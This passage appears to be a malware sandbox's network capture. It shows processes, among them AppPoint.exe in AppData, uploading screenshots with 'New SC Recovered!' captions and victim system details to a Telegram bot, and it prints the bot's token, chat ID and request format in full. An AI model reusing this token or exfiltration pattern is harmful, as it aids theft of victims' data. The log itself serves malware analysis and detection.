TF/^Qu*IqV2rBI#HB!H={9owe+clQ0kxIJNI<0:]A8uYN?61Lf^+a%pW%NpN9qS.jUT=Nj@_J`.mG{~VKjhnkW$(f1aX2rzuNmt\<baa1?toi
2025-01-10 15:56:44 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 35 65 62 38 65 39 62 66 34 30 31 65 2d 2d 0d 0a Data Ascii: -----------------------------8dd5eb8e9bf401e--
2025-01-10 15:56:45 UTC	1512	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 15:56:45 GMT Content-Type: application/json Content-Length: 1123 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":201789,"from":{"id":6224217116,"is_bot":true,"first_name":"chacha2023","username":"chacha1_bot"},"chat":{"id":1376739206,"first_name":"Chacha","last_name":"1","username":"chacha1000000","type":"private"},"date":1736524605,"document":{"file_name":"user-642294 2025-03-09 03-17-24.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQMUPWeBQz2yTXD_Y-1V3QqtJEfT8dBZAAI1HQACuyoJUJ4ElseUUV4sAQAHbQADNgQ","file_unique_id":"AQADNR0AArsqCVBy","file_size":10552,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQMUPWeBQz2yTXD_Y-1V3QqtJEfT8dBZAAI1HQACuyoJUJ4ElseUUV4sAQAHbQADNgQ","file_unique_id":"AQADNR0AArsqCVBy","file_size":10552,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAEDFD1ngUM9sk1w_2PtVd0KrSRH0_HQWQACNR0AArsqCVCeBJbHlFFeLDYE","file_unique_id":"AgADNR0AArsqCVA","file_size":57180},"caption":"New SC Recovered!\n\nTime: 03/09/2025 03:07:22\nUser Name: user/642294\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8 [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	50005	149.154.167.220	443	7512	C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 15:56:49 UTC	262	OUT	POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd642c1739caca Host: api.telegram.org Content-Length: 57831 Expect: 100-continue Connection: Keep-Alive
2025-01-10 15:56:49 UTC	25	IN	HTTP/1.1 100 Continue
2025-01-10 15:56:49 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 36 34 32 63 31 37 33 39 63 61 63 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 36 34 32 63 31 37 33 39 63 61 63 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 33 2f 31 36 2f 32 30 32 35 20 30 31 3a 33 34 3a 32 38 0a 55 73 65 72 Data Ascii: -----------------------------8dd642c1739cacaContent-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd642c1739cacaContent-Disposition: form-data; name="caption"New SC Recovered!Time: 03/16/2025 01:34:28User
2025-01-10 15:56:49 UTC	16355	OUT	Data Raw: 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"\|
2025-01-10 15:56:49 UTC	16355	OUT	Data Raw: 9d 14 0c 4c 52 52 f4 a3 14 00 94 71 4b 49 40 c2 92 9d f8 52 50 02 51 45 1d a9 0c 4a 28 fc 28 a0 04 14 94 ea 4a 43 12 8f ad 2d 25 00 1f 5a 28 a3 f1 a0 67 4b 45 14 56 47 88 14 51 48 cc ab d4 d4 ca 71 82 bc 9d 91 74 e9 4e ac b9 69 a6 df 96 a2 d1 4c f3 57 de 94 48 87 be 3e b5 8c 71 74 24 ec a6 8e c9 e5 98 ca 71 e6 95 27 6f 41 d4 52 d1 5d 07 00 94 51 45 00 14 51 41 20 0c 9e 05 00 b5 0a 2a 0f b5 db 8f f9 69 fa 1a 3e d7 6f ff 00 3d 3f 43 5c ff 00 5a a1 fc eb ef 47 7f f6 66 3b fe 7c cf ff 00 01 7f e4 4f 45 41 f6 bb 7f f9 e9 fa 1a 99 19 5d 43 29 c8 3d eb 48 56 a7 51 da 12 4f d1 98 d6 c1 e2 28 2e 6a d4 e5 15 e6 9a fc c5 a2 8a 2b 53 98 28 a2 8a 00 4a 29 68 a0 61 45 14 52 10 51 45 14 00 94 51 45 03 0a 28 a2 98 05 25 2d 25 00 14 51 45 03 0a 28 a2 80 0a 28 a2 80 0a 28 Data Ascii: LRRqKI@RPQEJ((JC-%Z(gKEVGQHqtNiLWH>qt$q'oAR]QEQA *i>o=?C\ZGf;\|OEA]C)=HVQO(.j+S(J)haERQEQE(%-%QE(((
2025-01-10 15:56:49 UTC	16355	OUT	Data Raw: 4b 49 40 05 14 51 40 05 14 51 4c 62 51 4b 49 40 05 14 51 40 05 14 51 40 05 25 2d 25 03 0a 28 a2 80 0a 28 a2 80 12 8a 28 a0 02 8a 28 a0 61 49 4b 45 00 25 14 51 40 05 14 51 4c 62 51 4b 45 00 25 14 b4 94 00 94 52 d2 50 01 45 14 53 18 52 52 d1 40 09 45 2d 25 00 14 51 4b 40 09 45 14 50 31 28 a5 a4 a0 02 8a 28 a6 01 45 14 50 31 28 a2 8a 00 28 a2 8a 00 4c 51 4b 45 30 12 8a 5c 51 40 c4 a2 96 8a 04 20 eb 5a 77 3f eb 8f d0 7f 2a cd 1d 6b 4e eb fd 71 fa 0f e5 59 4f e2 40 b7 21 a2 8a 28 34 0a 4a 5a 28 18 52 52 d1 40 09 45 14 50 01 45 14 b4 00 94 94 b4 50 01 45 2d 25 00 32 5f f8 f7 97 fd da ad 67 fe b1 be 95 66 6f f8 f7 97 fd da ad 65 fe b1 be 94 d6 cc 0b 94 b4 51 8a 40 25 14 b8 a3 14 82 e2 62 96 97 14 62 8b 85 c4 c5 14 b8 a3 14 5c 57 13 14 53 b0 7d 29 76 9f 4a 2e 17 Data Ascii: KI@Q@QLbQKI@Q@Q@%-%((((aIKE%Q@QLbQKE%RPESRR@E-%QK@EP1((EP1((LQKE0\Q@ Zw?*kNqYO@!(4JZ(RR@EPEPE-%2_gfoeQ@%bb\WS})vJ.
2025-01-10 15:56:49 UTC	7692	OUT	Data Raw: 54 95 d1 46 1e ce 0a 2f a1 c3 5e a2 ab 51 cd 75 2a 49 71 1d b4 56 b7 32 c9 72 1e 0d 42 49 23 8e 14 04 48 42 21 da cc 48 da 3d f0 7b d3 12 39 be c9 fd 9a 6f a1 13 b5 a9 90 db 05 93 7f da 0f ef 00 ce dd bf 77 0b f7 aa c1 b5 88 cc 65 2b f3 9e f4 c3 63 6c 51 94 c6 30 dd 6b 92 78 49 4a 4e 49 9e 95 3c c6 30 82 83 8d ec 85 b7 8e f0 ea 3a 5d d3 41 38 b7 75 b2 c4 be 59 d8 4e 13 3f 36 31 d6 aa db ce 4c 96 af 66 5e 2b 61 25 ca 83 70 e0 b4 57 25 4e cc b6 00 0a 70 a5 4e 07 39 ce 71 53 2e 99 6a aa 55 54 85 3d a9 4e 9d 6a 40 1e 5f 4a 99 60 e7 2e bd ff 00 12 e3 98 d3 8b 6d 47 7b 7e 0a c4 56 d0 4b 6a da 68 9d 6e ed ee e6 6b 88 8c 57 24 28 66 31 61 58 02 06 32 cc 06 72 7a 75 a4 81 a7 b1 8f 4e b7 bb 0d 6d 74 f2 5c 3c 62 61 b3 61 31 85 8d 9b 3f 74 6f 1c 13 e9 9a 98 69 b6 a3 Data Ascii: TF/^Qu*IqV2rBI#HB!H={9owe+clQ0kxIJNI<0:]A8uYN?61Lf^+a%pW%NpN9qS.jUT=Nj@_J`.mG{~VKjhnkW$(f1aX2rzuNmt\<baa1?toi
2025-01-10 15:56:49 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 36 34 32 63 31 37 33 39 63 61 63 61 2d 2d 0d 0a Data Ascii: -----------------------------8dd642c1739caca--
2025-01-10 15:56:50 UTC	1512	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 15:56:50 GMT Content-Type: application/json Content-Length: 1123 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":201790,"from":{"id":6224217116,"is_bot":true,"first_name":"chacha2023","username":"chacha1_bot"},"chat":{"id":1376739206,"first_name":"Chacha","last_name":"1","username":"chacha1000000","type":"private"},"date":1736524610,"document":{"file_name":"user-642294 2025-03-16 01-44-28.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQMUPmeBQ0FDOqNs4ELx0Hkb_4knLgQ1AAI2HQACuyoJUIvHKRG3LRaiAQAHbQADNgQ","file_unique_id":"AQADNh0AArsqCVBy","file_size":10571,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQMUPmeBQ0FDOqNs4ELx0Hkb_4knLgQ1AAI2HQACuyoJUIvHKRG3LRaiAQAHbQADNgQ","file_unique_id":"AQADNh0AArsqCVBy","file_size":10571,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAEDFD5ngUNBQzqjbOBC8dB5G_-JJy4ENQACNh0AArsqCVCLxykRty0WojYE","file_unique_id":"AgADNh0AArsqCVA","file_size":57208},"caption":"New SC Recovered!\n\nTime: 03/16/2025 01:34:28\nUser Name: user/642294\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8 [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	50006	149.154.167.220	443	5464	C:\Users\user\Desktop\IUqsn1SBGy.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 15:57:11 UTC	238	OUT	POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd6e4c8b4b6429 Host: api.telegram.org Content-Length: 57807 Expect: 100-continue
2025-01-10 15:57:12 UTC	25	IN	HTTP/1.1 100 Continue
2025-01-10 15:57:12 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 36 65 34 63 38 62 34 62 36 34 32 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 36 65 34 63 38 62 34 62 36 34 32 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 33 2f 32 38 2f 32 30 32 35 20 32 32 3a 35 31 3a 35 37 0a 55 73 65 72 Data Ascii: -----------------------------8dd6e4c8b4b6429Content-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd6e4c8b4b6429Content-Disposition: form-data; name="caption"New SC Recovered!Time: 03/28/2025 22:51:57User
2025-01-10 15:57:12 UTC	16355	OUT	Data Raw: 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"\|
2025-01-10 15:57:12 UTC	16355	OUT	Data Raw: 9d 14 0c 4c 52 52 f4 a3 14 00 94 71 4b 49 40 c2 92 9d f8 52 50 02 51 45 1d a9 0c 4a 28 fc 28 a0 04 14 94 ea 4a 43 12 8f ad 2d 25 00 1f 5a 28 a3 f1 a0 67 4b 45 14 56 47 88 14 51 48 cc ab d4 d4 ca 71 82 bc 9d 91 74 e9 4e ac b9 69 a6 df 96 a2 d1 4c f3 57 de 94 48 87 be 3e b5 8c 71 74 24 ec a6 8e c9 e5 98 ca 71 e6 95 27 6f 41 d4 52 d1 5d 07 00 94 51 45 00 14 51 41 20 0c 9e 05 00 b5 0a 2a 0f b5 db 8f f9 69 fa 1a 3e d7 6f ff 00 3d 3f 43 5c ff 00 5a a1 fc eb ef 47 7f f6 66 3b fe 7c cf ff 00 01 7f e4 4f 45 41 f6 bb 7f f9 e9 fa 1a 99 19 5d 43 29 c8 3d eb 48 56 a7 51 da 12 4f d1 98 d6 c1 e2 28 2e 6a d4 e5 15 e6 9a fc c5 a2 8a 2b 53 98 28 a2 8a 00 4a 29 68 a0 61 45 14 52 10 51 45 14 00 94 51 45 03 0a 28 a2 98 05 25 2d 25 00 14 51 45 03 0a 28 a2 80 0a 28 a2 80 0a 28 Data Ascii: LRRqKI@RPQEJ((JC-%Z(gKEVGQHqtNiLWH>qt$q'oAR]QEQA *i>o=?C\ZGf;\|OEA]C)=HVQO(.j+S(J)haERQEQE(%-%QE(((
2025-01-10 15:57:12 UTC	16355	OUT	Data Raw: 4b 49 40 05 14 51 40 05 14 51 4c 62 51 4b 49 40 05 14 51 40 05 14 51 40 05 25 2d 25 03 0a 28 a2 80 0a 28 a2 80 12 8a 28 a0 02 8a 28 a0 61 49 4b 45 00 25 14 51 40 05 14 51 4c 62 51 4b 45 00 25 14 b4 94 00 94 52 d2 50 01 45 14 53 18 52 52 d1 40 09 45 2d 25 00 14 51 4b 40 09 45 14 50 31 28 a5 a4 a0 02 8a 28 a6 01 45 14 50 31 28 a2 8a 00 28 a2 8a 00 4c 51 4b 45 30 12 8a 5c 51 40 c4 a2 96 8a 04 20 eb 5a 77 3f eb 8f d0 7f 2a cd 1d 6b 4e eb fd 71 fa 0f e5 59 4f e2 40 b7 21 a2 8a 28 34 0a 4a 5a 28 18 52 52 d1 40 09 45 14 50 01 45 14 b4 00 94 94 b4 50 01 45 2d 25 00 32 5f f8 f7 97 fd da ad 67 fe b1 be 95 66 6f f8 f7 97 fd da ad 65 fe b1 be 94 d6 cc 0b 94 b4 51 8a 40 25 14 b8 a3 14 82 e2 62 96 97 14 62 8b 85 c4 c5 14 b8 a3 14 5c 57 13 14 53 b0 7d 29 76 9f 4a 2e 17 Data Ascii: KI@Q@QLbQKI@Q@Q@%-%((((aIKE%Q@QLbQKE%RPESRR@E-%QK@EP1((EP1((LQKE0\Q@ Zw?*kNqYO@!(4JZ(RR@EPEPE-%2_gfoeQ@%bb\WS})vJ.
2025-01-10 15:57:12 UTC	7668	OUT	Data Raw: 54 95 d1 46 1e ce 0a 2f a1 c3 5e a2 ab 51 cd 75 2a 49 71 1d b4 56 b7 32 c9 72 1e 0d 42 49 23 8e 14 04 48 42 21 da cc 48 da 3d f0 7b d3 12 39 be c9 fd 9a 6f a1 13 b5 a9 90 db 05 93 7f da 0f ef 00 ce dd bf 77 0b f7 aa c1 b5 88 cc 65 2b f3 9e f4 c3 63 6c 51 94 c6 30 dd 6b 92 78 49 4a 4e 49 9e 95 3c c6 30 82 83 8d ec 85 b7 8e f0 ea 3a 5d d3 41 38 b7 75 b2 c4 be 59 d8 4e 13 3f 36 31 d6 aa db ce 4c 96 af 66 5e 2b 61 25 ca 83 70 e0 b4 57 25 4e cc b6 00 0a 70 a5 4e 07 39 ce 71 53 2e 99 6a aa 55 54 85 3d a9 4e 9d 6a 40 1e 5f 4a 99 60 e7 2e bd ff 00 12 e3 98 d3 8b 6d 47 7b 7e 0a c4 56 d0 4b 6a da 68 9d 6e ed ee e6 6b 88 8c 57 24 28 66 31 61 58 02 06 32 cc 06 72 7a 75 a4 81 a7 b1 8f 4e b7 bb 0d 6d 74 f2 5c 3c 62 61 b3 61 31 85 8d 9b 3f 74 6f 1c 13 e9 9a 98 69 b6 a3 Data Ascii: TF/^Qu*IqV2rBI#HB!H={9owe+clQ0kxIJNI<0:]A8uYN?61Lf^+a%pW%NpN9qS.jUT=Nj@_J`.mG{~VKjhnkW$(f1aX2rzuNmt\<baa1?toi
2025-01-10 15:57:12 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 36 65 34 63 38 62 34 62 36 34 32 39 2d 2d 0d 0a Data Ascii: -----------------------------8dd6e4c8b4b6429--
2025-01-10 15:57:12 UTC	1512	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 15:57:12 GMT Content-Type: application/json Content-Length: 1123 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":201791,"from":{"id":6224217116,"is_bot":true,"first_name":"chacha2023","username":"chacha1_bot"},"chat":{"id":1376739206,"first_name":"Chacha","last_name":"1","username":"chacha1000000","type":"private"},"date":1736524632,"document":{"file_name":"user-642294 2025-03-28 23-01-59.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQMUP2eBQ1j2b5zniQahs1XhIyP6orK_AAI3HQACuyoJULnEzvnL_5gDAQAHbQADNgQ","file_unique_id":"AQADNx0AArsqCVBy","file_size":10551,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQMUP2eBQ1j2b5zniQahs1XhIyP6orK_AAI3HQACuyoJULnEzvnL_5gDAQAHbQADNgQ","file_unique_id":"AQADNx0AArsqCVBy","file_size":10551,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAEDFD9ngUNY9m-c54kGobNV4SMj-qKyvwACNx0AArsqCVC5xM75y_-YAzYE","file_unique_id":"AgADNx0AArsqCVA","file_size":57184},"caption":"New SC Recovered!\n\nTime: 03/28/2025 22:51:57\nUser Name: user/642294\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8 [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	50007	149.154.167.220	443	7512	C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 15:57:21 UTC	262	OUT	POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd70b23c932623 Host: api.telegram.org Content-Length: 57807 Expect: 100-continue Connection: Keep-Alive
2025-01-10 15:57:21 UTC	25	IN	HTTP/1.1 100 Continue
2025-01-10 15:57:21 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 37 30 62 32 33 63 39 33 32 36 32 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 37 30 62 32 33 63 39 33 32 36 32 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 34 2f 30 31 2f 32 30 32 35 20 30 30 3a 31 34 3a 35 35 0a 55 73 65 72 Data Ascii: -----------------------------8dd70b23c932623Content-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd70b23c932623Content-Disposition: form-data; name="caption"New SC Recovered!Time: 04/01/2025 00:14:55User
2025-01-10 15:57:21 UTC	16355	OUT	Data Raw: 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"\|
2025-01-10 15:57:21 UTC	16355	OUT	Data Raw: 9d 14 0c 4c 52 52 f4 a3 14 00 94 71 4b 49 40 c2 92 9d f8 52 50 02 51 45 1d a9 0c 4a 28 fc 28 a0 04 14 94 ea 4a 43 12 8f ad 2d 25 00 1f 5a 28 a3 f1 a0 67 4b 45 14 56 47 88 14 51 48 cc ab d4 d4 ca 71 82 bc 9d 91 74 e9 4e ac b9 69 a6 df 96 a2 d1 4c f3 57 de 94 48 87 be 3e b5 8c 71 74 24 ec a6 8e c9 e5 98 ca 71 e6 95 27 6f 41 d4 52 d1 5d 07 00 94 51 45 00 14 51 41 20 0c 9e 05 00 b5 0a 2a 0f b5 db 8f f9 69 fa 1a 3e d7 6f ff 00 3d 3f 43 5c ff 00 5a a1 fc eb ef 47 7f f6 66 3b fe 7c cf ff 00 01 7f e4 4f 45 41 f6 bb 7f f9 e9 fa 1a 99 19 5d 43 29 c8 3d eb 48 56 a7 51 da 12 4f d1 98 d6 c1 e2 28 2e 6a d4 e5 15 e6 9a fc c5 a2 8a 2b 53 98 28 a2 8a 00 4a 29 68 a0 61 45 14 52 10 51 45 14 00 94 51 45 03 0a 28 a2 98 05 25 2d 25 00 14 51 45 03 0a 28 a2 80 0a 28 a2 80 0a 28 Data Ascii: LRRqKI@RPQEJ((JC-%Z(gKEVGQHqtNiLWH>qt$q'oAR]QEQA *i>o=?C\ZGf;\|OEA]C)=HVQO(.j+S(J)haERQEQE(%-%QE(((
2025-01-10 15:57:21 UTC	16355	OUT	Data Raw: 4b 49 40 05 14 51 40 05 14 51 4c 62 51 4b 49 40 05 14 51 40 05 14 51 40 05 25 2d 25 03 0a 28 a2 80 0a 28 a2 80 12 8a 28 a0 02 8a 28 a0 61 49 4b 45 00 25 14 51 40 05 14 51 4c 62 51 4b 45 00 25 14 b4 94 00 94 52 d2 50 01 45 14 53 18 52 52 d1 40 09 45 2d 25 00 14 51 4b 40 09 45 14 50 31 28 a5 a4 a0 02 8a 28 a6 01 45 14 50 31 28 a2 8a 00 28 a2 8a 00 4c 51 4b 45 30 12 8a 5c 51 40 c4 a2 96 8a 04 20 eb 5a 77 3f eb 8f d0 7f 2a cd 1d 6b 4e eb fd 71 fa 0f e5 59 4f e2 40 b7 21 a2 8a 28 34 0a 4a 5a 28 18 52 52 d1 40 09 45 14 50 01 45 14 b4 00 94 94 b4 50 01 45 2d 25 00 32 5f f8 f7 97 fd da ad 67 fe b1 be 95 66 6f f8 f7 97 fd da ad 65 fe b1 be 94 d6 cc 0b 94 b4 51 8a 40 25 14 b8 a3 14 82 e2 62 96 97 14 62 8b 85 c4 c5 14 b8 a3 14 5c 57 13 14 53 b0 7d 29 76 9f 4a 2e 17 Data Ascii: KI@Q@QLbQKI@Q@Q@%-%((((aIKE%Q@QLbQKE%RPESRR@E-%QK@EP1((EP1((LQKE0\Q@ Zw?*kNqYO@!(4JZ(RR@EPEPE-%2_gfoeQ@%bb\WS})vJ.
